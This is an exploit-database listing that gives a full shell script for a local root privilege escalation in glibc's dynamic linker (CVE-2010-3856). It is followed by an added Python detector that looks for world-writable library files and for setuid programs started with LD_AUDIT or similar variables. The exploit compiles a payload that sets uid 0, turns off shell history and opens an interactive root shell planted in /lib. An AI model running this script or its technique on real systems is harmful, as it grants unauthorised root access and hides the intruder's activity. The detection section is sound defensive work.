0day.today - Biggest Exploit Database in the World.
glibc LD_AUDIT arbitrary DSO load Privilege Escalation
```sh
#!/bin/sh
#######################################################
#       I Can't Read and I Won't Race You Either      #
#                      by zx2c4                       #
#######################################################
################################################################################
# This is an exploit for CVE-2010-3856.
#
# A while back, Tavis showed us three ways to exploit flaws in glibc's dynamic
# linker involving LD_AUDIT. [1] [2]
#
# The first way involved opening a file descriptor and using fexecve to easily
# win a race with $ORIGIN. The problem was that this required having read
# permissions on the SUID executables. Tavis recommended a workaround involving
# filling a pipe until it was full so that anything written to stderr would
# block. This race, however, was not always successful. The third thing he
# showed us was that LD_AUDIT would load any trusted library, and he pointed out
# that libpcprofile.so could be jiggered to create a world writable root owned
# file in any directory. One candidate would be to write something to a crontab.
# What if, however, you don't have cron installed? He then went on to explain a
# quite extensive search routine to find candidates for libraries to load.
#
# But why search, when you already can make a world writable root owned file in
# any directory you want? The easier way is to use libpcprofile.so to create
# such a file, and then fill that file with code you want to run. Then, run that
# code using the same trick. Pretty simple, and it works.
#
# - zx2c4
# 2011-11-9
#
# greets to taviso.
#
# [1] http://seclists.org/fulldisclosure/2010/Oct/257
# [2] http://seclists.org/bugtraq/2010/Oct/200
################################################################################

echo "[+] Setting umask to 0 so we have world writable files."
umask 0

echo "[+] Preparing binary payload."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
	printf("[+] Cleaning up.\n");
	unlink("/lib/libexploit.so");
	printf("[+] Launching shell.\n");
	setuid(0);
	setgid(0);
	setenv("HISTFILE", "/dev/null", 1);
	execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null

echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/libexploit.so
rm /tmp/payload.c /tmp/exploit

echo "[+] Executing payload."
LD_AUDIT="libexploit.so" ping
```

# 0day.today [2024-07-01] #
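The script above relies on two observable conditions: a world-writable, root-owned file left inside a trusted library directory, and a set-uid binary being started with a loader variable (LD_AUDIT) in its environment. The following is an added defensive example, not code from the exploit author or from the 0day.today listing, that checks for both. The exec-record dictionary format, the `make_sandbox` directory and the file names in it are constructed for illustration and do not correspond to any real audit log format.

```python
import os
import stat
import tempfile

# Environment variables that glibc's ld.so consults when a program starts.
# LD_AUDIT and LD_PRELOAD cause a shared object to be mapped before main().
LOADER_ENV_VARS = ("LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH")


def world_writable_files(root):
    """Return regular files under `root` whose mode grants write to 'other'.

    The exploit's first step plants exactly such a file (root-owned, created
    with umask 0) inside a trusted library directory, so any hit from a scan
    of /lib, /usr/lib and friends is worth investigating.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def loader_vars_in_env(env):
    """Return the ld.so loader variables present in an environment mapping."""
    return {k: env[k] for k in LOADER_ENV_VARS if k in env}


def flag_setuid_exec(exec_record):
    """Classify one exec record (constructed format, not a real audit log):
    {'path': str, 'mode': int (st_mode), 'env': dict}.

    Returns a list of reasons the execution is suspicious; empty means clean.
    The combination the exploit needs is a set-uid/set-gid binary started
    with a loader variable in its environment; unprivileged binaries with
    LD_PRELOAD set are normal and are not flagged.
    """
    reasons = []
    privileged = bool(exec_record["mode"] & (stat.S_ISUID | stat.S_ISGID))
    loader = loader_vars_in_env(exec_record["env"])
    if privileged and loader:
        for var, value in sorted(loader.items()):
            reasons.append(
                f"setuid/setgid {exec_record['path']} started with {var}={value}")
    return reasons


def make_sandbox():
    """Build a constructed fake library directory for demonstration: one
    normally-permissioned file and one world-writable one, the kind of
    leftover the exploit's first step produces. Returns (dir, good, bad)."""
    tmp = tempfile.mkdtemp(prefix="libscan_")
    good = os.path.join(tmp, "libgood.so")
    bad = os.path.join(tmp, "libplanted.so")
    for p in (good, bad):
        with open(p, "w"):
            pass
    os.chmod(good, 0o644)
    os.chmod(bad, 0o666)   # explicit mode, so the caller's umask does not matter
    return tmp, good, bad


def demo():
    tmp, _good, _bad = make_sandbox()
    print("world-writable under", tmp, "->", world_writable_files(tmp))

    # Constructed exec records: a set-uid ping with LD_AUDIT set (the page's
    # pattern), the same binary started cleanly, and a non-setuid binary
    # started with LD_PRELOAD (benign).
    records = [
        {"path": "/bin/ping", "mode": 0o104755, "env": {"LD_AUDIT": "libpcprofile.so"}},
        {"path": "/bin/ping", "mode": 0o104755, "env": {"PATH": "/usr/bin"}},
        {"path": "/usr/bin/id", "mode": 0o100755, "env": {"LD_PRELOAD": "libfoo.so"}},
    ]
    for rec in records:
        print(rec["path"], "->", flag_setuid_exec(rec) or "ok")


if __name__ == "__main__":
    demo()
```

In production the file scan would be pointed at the real trusted library directories and the exec records would come from whatever process-start telemetry is available (auditd execve records with their environment, or an EDR feed); the classification logic is the same.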